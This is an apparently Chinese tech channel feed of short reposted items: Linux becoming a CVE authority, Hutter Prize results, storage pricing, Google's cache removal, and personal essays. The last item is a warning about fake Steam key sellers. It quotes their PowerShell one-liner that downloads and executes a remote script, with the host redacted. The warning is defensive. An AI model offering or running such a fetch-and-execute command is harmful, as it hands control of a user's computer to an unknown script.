share

share

1. 14:01 · Feb 20, 2024 · Tue

   Linux 内核成为 CVE 编号颁发机构，发布相关指南
   
   2024-02-19 21:59 by 星尘
   
   Linux 内核项目最近成为了 CVE 编号颁发机构，Linux 作者 Linus Torvalds 周末释出了 Linux 6.8-rc5，其中一个文档方面的变化就是 CVE 漏洞处理相关的指南。分配的 CVE 编号将在 linux-cve-announce 邮件列表上公布，修复的安全漏洞才会分配 CVE 编号，未修复的不会自动分配编号。
   
   https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/Documentation/process/cve.rst?id=5928d411557ec5d53832cdd39fc443704a3e5b77
   https://www.phoronix.com/news/Linux-6.8-rc5
   
   #安全

2. 16:06 · Feb 18, 2024 · Sun

   

   ×

   

   感觉是先检测出特定国家账户（中国、伊朗、俄罗斯和北朝鲜都不在 OpenAI 的可用国家列表内）然后封号，后面再拉出对话记录进行研究分析。
   
   所以，实际上会不会和微信一样，你使用 OpenAI 的对话记录都在云端好好存着，就等着哪天事后清算？不用猜了，Privacy policy 已经写明会存的了。
   
   https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors

3. 15:30 · Feb 16, 2024 · Fri

   

   ×

   

   from Gawr Guraᅠ⁧~喵⁧

4. 10:54 · Feb 12, 2024 · Mon

   人类知识无损压缩 Hutter 奖再次颁奖
   
   2024-02-11 21:18 by 巨龙之日
   
   2006 年，德国 AI 研究员 Marcus Hutter 宣布了人类知识无损压缩 Hutter 奖，总奖金 5 万欧元。2020 年奖金金额提高到 50 万欧元，而 Hutter 如今在 Google DeepMind 担任高级研究员。该奖项旨在鼓励 AI 研究，组织者认为文本压缩和 AI 是一个等价问题。用数学家 Gregory Chaitin 话说，压缩就是理解。压缩的对象是一个特定版本的英文维基百科文本，一开始是 100MB 大小，2020 年提高到 1GB，规则是每改进 x% 就获得等价比例的奖金，如改进 1% 就奖励 5 千欧元。Hutter 奖此前颁发了五次，其中四处是颁给了 Alexander Ratushnyak。去年 7 月纽约高频/算法交易和金融服务基金的量化开发者 Saurabh Kumar 将 10 亿字符压缩到 114,156,155 字节，压缩率 11.41%，比之前的记录改进了 1.04%，因此赢得了 5187 欧元奖金。时隔半年之后，Kaido Orav 的压缩程序 fx-cmix 将 10 亿字符压缩到 112 578 322 字节，比去年的纪录改进了 1.38%，获得了 6911 欧元奖励。
   
   http://prize.hutter1.net/
   https://github.com/kaitz/fx-cmix
   
   #数据存储

5. 05:07 · Feb 11, 2024 · Sun

   《失败比成功更重要》
   
   最近我经常思考如何快速学习、快速进步，有一点小小的收获：
   
   人生之路上，失败带来的价值，远远高于成功。
   
   一次成功，有可能只是因为你运气好，而你完全不知道自己「做对」了哪些关键步骤。一次失败，却可以让你得到的是真实的、最值钱的、最不可替代的知识。
   
   就像软件工程，一个脚本跑不通，马上获取报错信息，通过 Google 和 chatGPT 找到知识盲区，迅速改正，再跑，又错，再改，成功跑通。因为可以快速失败、快速重建，所以传统行业可能几年都无法完成的迭代，对程序员来说一个上午就能完成。软件行业因此才能用相比其他行业来说堪称「光速」的效率来进步。
   
   又如开车，老司机坐进一辆陌生的车，会先狠踩油门然后狠踩刹车，熟悉一下车辆的极限性能，才安稳上路。我开车时，也会这样测试车辆性能和操控感，例如拐弯不减速、故意压过一个水坑、用较快速度通过减速带等等，用这些日常错误的操作方式，来获取正常渠道难以获得的第一手知识。这是人类自古以来就有的学习捷径。
   
   尽可能频繁、低成本的去失败，会带给你大量而珍贵的知识储备。久而久之，将迎来毫无疑问的、确定性的、无比稳固的成功。
   
   我有个富一代朋友，他30岁前在深圳龙华开了一个专做外贸礼品定制的工厂，自己就是公司的金牌销售、创造了70%的销售额，靠自己一双手在深圳福田买了两套房，一辆150万的车，并支撑了一家人的豪华生活。闲聊的时候，他曾经问出一个奇葩的天问——为什么我比同龄人优秀这么多？
   
   他既有骄傲的一面，也有谦卑的一面。一方面那几年真的意气风发、必然觉得自己是天纵奇才；另一方面，他或许真的好奇自己到底作对了哪些事情。后来，他搞软件，做的乱七八糟，赔的底掉，惨淡收场。显然，我这位朋友最终也没想明白那个奇葩问题的答案。
   
   太顺利，会让人放松警惕。更进一步，太顺利，实际上剥夺了你了解「真相」的机会。当你一路畅通无阻、却并不清楚「真相」的时候，如盲人骑瞎马，危矣。
   
   例如我前段时间发现自己的车载电池不太经用，简单换了个新电池。有一次出门加油，直接趴在加油站无法启动了，最终连转向助力系统都停摆，汽车完全死掉。一个人坐在车里，紧急研究如何低成本拖车，尽力找一个周六晚上还上班的靠谱修车场，等拖车，最终换了汽车发电机和皮带，彻底解决了电池问题。如果未经历过这件事，我对发电机、道路救援等将一无所知，虽然过程很麻烦，但知识和经验实打实的得到了。现在我定期检查电池健康度，不必担心发电机效率过低，也知道万一再次趴窝应该怎么处理。
   
   成功，不仅只是一个结尾，更应该是一个「必然到来的胜利」。如同玩RTS游戏，开局一条狗，其他全靠一点一点探索战争迷雾，最终心中对胜率大致有个预计。失败，就是不停探路的过程，拼凑自己的世界地图，迎来自己预期中的胜利。
   
   我们应该追求的是知识和经验，而不是一次成功。知识和经验当然会导向成功，但成功本身只是追求知识和经验的副产品、而不是目的。如果失败能带来知识和经验（往往确实如此，而且带来的是价值最高的那部分），那么我们应该勇敢的追求失败，越快、越多、越好。
   
   主动、快速、频繁的失败，是一个伟大的战略。如果人人都明白失败带来的东西有多么宝贵，我猜这个世界上很少有人会直奔成功了。幸好大多数人并不喜欢失败，「失败」这个赛道才不至于太卷，追求知识的过程才显得更加有趣。
   
   https://aliengu.com/archives/35599

6. 12:51 · Feb 10, 2024 · Sat

   

   ×

   

   via ravi

7. 00:46 · Feb 10, 2024 · Sat

   Linux 和 libc 给您
   
   🎆 拜 🎆 年 🎆 啦 🎆
   
   在这辞旧迎新的美好时刻：
   
   🧨 printf 携手 fprintf, dprintf, sprintf, snprintf, vprintf, vfprintf, vdprintf, vsprintf, vsnprintf, fputc, fputs, putc, putchar, puts 祝您新的一年能大展宏图
   🧨 scanf 携 sscanf, vsscanf, fscanf, vscanf, vfscanf, fgetc, fgets, getc, getchar 祝您财源广进，金银满仓，钱途无量
   🧨 exit, _exit, _Exit, atexit, on_exit, quick_exit, at_quick_exit 希望您在这一年终末，能够善始善终，圆满收官
   🧨 execl, execlp, execle, execv, execvp, execvpe 愿您新的一年开启新篇章，事业生活蒸蒸日上
   🧨 signal, sigaction, sigvec, sigblock, sigsetmask, siggetmask, sigmask, setjmp, sigsetjmp, longjmp, siglongjmp 愿您新的一年能逢凶化吉，巧解难题
   最后，alarm, sleep, usleep, nanosleep, clock_nanosleep, pause 愿您新的一年能安枕无忧，好睡眠，身体康健
   
   🎆 祝大家新年快乐，万事如意！

8. 08:30 · Feb 9, 2024 · Fri

   #工具
   devv.ai，面向程序员的人工智能搜索引擎。

9. 13:58 · Feb 6, 2024 · Tue

   idrive E2 据说是最便宜的s3服务商 $30/tb/年 或者 $4/tb/月 https://www.idrive.com/s3-storage-e2/pricing 有限制免费流量最多3倍存储 超出的$0.01/GB=$10.24/tb
   
   对比B2 $6/tb/月=72/tb/年 免费流量也是3倍存储 超出的$0.01/GB=$10.24/tb
   
   对比cloudflare R2 $0.015/GB/月 = $184.32/tb/年 但流量免费
   
   对比pcloud终生方案 399u=2tb终生 https://www.pcloud.com/zh/cloud-storage-pricing-plans.html?period=lifetime
   
   对比 自己买硬盘 HC320 8tb 京东目前1319元 = $26.1/tb （按可用7.2tb计算 ）
   
   但是还是比不上阿里云盘 288元 8tb 2年 = $2.57/tb/年 流量也免费

   Idrive

   IDrive® e2 plans and pricing for cloud storage

   IDrive® e2 offers secure cloud object storage and seamless access to your data at affordable pricing

10. 03:22 · Feb 6, 2024 · Tue

    就他妈的纯傻逼，使劲薅，最后大家都没得用
    https://x.com/johnwmm/status/1752706508327104808

11. 02:07 · Feb 6, 2024 · Tue

    

    ×

    

    via 匿名

12. 11:11 · Feb 4, 2024 · Sun

    如今代码的安全问题，很大一部分在于 写代码的程序员自己都没意识自己在做什么。
    不过并不只是程序员的问题，而是默认行为的问题。
    
    库对程序员的知识要求太高，认为他们知道自己在做什么，但是他们只是在复制粘贴网上找到的代码
    
    像打开一个文件时基本只会考虑普通文件，不会考虑权限，不会考虑这可能是一个符号链接。
    也就是并不清楚接口全部默认能力，就可能出现未预料行为。
    尤其是Java那堆企业级 里面有多少功能没多少人能全弄清楚。
    
    为了减少低水平程序员bug，现在有强制要求 使用类型系统/处理异常的。
    但是几乎没有处理这种情况的，都选择相信了程序员水平，事实证明并不行，包括我也不会真的去读完文档。
    
    而且现在门槛还更低了，为了安全和稳定性，我觉得最后框架大概都会向使用者水平妥协，对每个额外行为都要求声明自己知道自己在干什么.

13. 14:19 · Feb 3, 2024 · Sat

    

    ×

    

    由于边缘计算能力的持续提高，一次性的FPV也可能开始搭载简单的AI用于在被干扰后也能自主完成打击任务。
    
    未来的反AI“迷彩”将需要改变装备的外形，使得基于视觉的AI产生误判。什么样的“迷彩”都是可能的。
    
    美军在过去的演习测试中已经发现了这个问题。在受过训练的AI智慧射击站面前，士兵在起初的崩溃后很快发现了AI的弱点，甚至像“Metal Gear”游戏中那样套个纸箱，就可轻松在AI杀手的监视下自由行动。

14. 13:22 · Feb 3, 2024 · Sat

    Google 搜索杀死了网页缓存
    
    2024-02-03 14:42 by 飞向阿尔孔
    
    Google 又杀死了一个对用户有用的功能：网页缓存。搜索引擎爬虫在索引网页时会创建一个备份，从某种程度上相当于备份了互联网的历史，因为在用户查询相同网页时有种种原因会导致网页无法访问，比如链接改变，网页删除，或者可能网站都关闭了，有了缓存用户至少可以查询到原始内容。但 Google“Search Liaison”Danny Sullivan 现在确认网页缓存功能被移除了，理由是缓存是为了帮助用户访问页面加载太慢的网页，现在这种情况有了很大改善，因此 Google 决定退役该功能。简直就是胡说八道。Google 目前只是杀死了缓存链接，还没有彻底杀死该功能，用户可以通过 https://webcache.googleusercontent.com/search?q=cache:加上网址访问该网址的缓存。当网页缓存被彻底杀死之后，可能只有互联网档案馆会保留互联网的历史。
    
    
    https://arstechnica.com/?p=2000802
    
    
    #Google

15. 10:48 · Feb 1, 2024 · Thu

    17 楼有人生智慧：
    https://www.v2ex.com/t/1006839
    
    希望你意识到除了你的憨批亲戚不会做人之外，还有你过于忽视你自己的产出、不会包装自己的产出和消耗这一个巨大原因导致这样的结果。
    对适当的对象要适时切换对话方式，“小 case 分分钟搞定”“虽然难度很大但是我花点时间能做”“这个不好说啊，只能尽力，我压榨下自己的业余时间吧”，即使这些话背后你做的事情和消耗的时间是一模一样的。

    V2EX

    帮不懂技术的亲戚长辈用 GPT 生成文章需谨慎，你容易变成 Ta 的 GPT.... - V2EX

    生活 - @InvalidUsername - RT 。           去年我有个亲戚（年龄 50+）在工作上要用到一个网站，不太会操作，找我帮忙远程操作。其中需要上传几篇文章，但当时他还没写， 我就想干脆用 gpt 帮他生成这样我

16. 11:52 · Jan 29, 2024 · Mon

    买了半年的健身卡，去的次数不到 7 次，哎。明天开始爬楼梯。
    
    丁香医生开始重新更新了，可喜可贺。
    
    https://mp.weixin.qq.com/s/tLdEMYDKfQ0TqiNHnehjGQ

    Weixin Official Accounts Platform

    坚持爬楼锻炼，一个月后你会来谢我的

    真不是健身房去不起！

17. 11:43 · Jan 29, 2024 · Mon

    13秒，拯救不开心~

18. 07:19 · Jan 29, 2024 · Mon

    

    ×

    

    from 天 14:06 PM UTC+8 🕑

19. 06:58 · Jan 29, 2024 · Mon

    

    ×

    

    HTTP ERROR CODE be like:
    
    via Gold Fish

20. 03:36 · Jan 28, 2024 · Sun

    安全提醒：部分商家通过出售虚假 Steam 激活码的方式为用户电脑植入病毒
    
    部分用户反馈，自己在淘宝店购买 Steam CD Key 后，对方要求通过 PowerShell 来进行激活。
    
    例如，在 PowerShell 中输入以下代码：
    
    irm [REDACTED].run | iex
    
    这段代码实际上是从给定的链接中下载了一段 PowerShell 脚本并在用户电脑执行，用户往往被要求以管理员权限打开 PowerShell。
    
    根据互联网搜索，在 2023 年 10 月这种方式便开始流行。类似的变种经过搜索还有几种，不一一列举。
    
    根据部分分析结果，这个脚本通过注入用户的 Steam 客户端，利用共享账号等方式，来实现假激活 / 假入库等。
    
    如果你购买的 Steam CD Key 不能直接通过 Steam 客户端激活，请直接进行退款，不要在你的电脑上运行任何来路不明的脚本 / 软件。
    
    相关内容：
    
    https://www.zhihu.com/question/628569920
    https://www.zhihu.com/question/625605216
    https://www.zhihu.com/question/627558855
    https://bbs.kanxue.com/thread-279738.htm
    https://www.cnblogs.com/macanpsc/p/17831267.html
    https://nga.178.com/read.php?tid=38341997&rand=495
    https://www.suca.cc/319.html
    https://keylol.com/t920654-1-1